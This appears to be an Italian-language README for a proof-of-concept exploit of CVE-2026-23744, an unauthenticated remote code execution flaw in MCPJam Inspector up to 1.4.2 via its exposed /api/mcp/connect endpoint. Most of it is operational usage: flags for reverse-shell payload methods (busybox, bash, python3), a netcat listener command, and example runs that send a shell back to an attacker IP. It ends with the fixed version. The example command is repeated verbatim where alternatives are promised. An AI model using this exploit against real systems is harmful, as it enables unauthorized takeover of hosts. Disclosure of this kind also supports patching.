
CVE-2026-23744 — Proof of concept per una vulnerabilità di Remote Code Execution non autenticata in MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 si associa a 0.0.0.0 per impostazione predefinita ed espone /api/mcp/connect senza alcuna autenticazione. L'endpoint accetta un oggetto serverConfig che avvia un processo direttamente sull'host — passando un payload di reverse shell si ottiene un RCE immediato senza credenziali richieste.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Flag | Descrizione | Predefinito |
|---|---|---|
-u | URL di destinazione | richiesto |
-i | IP del tuo listener (LHOST) | richiesto |
-p | Porta del tuo listener (LPORT) | richiesto |
-m | Metodo del payload: busybox, bash, python3 | busybox |
Passo 1 — Avvia il tuo listener:
nc -lvnp 4444
Passo 2 — Esegui l'exploit:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Se busybox non funziona sul target, prova gli altri metodi:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Software | Vulnerabile | Corretta |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |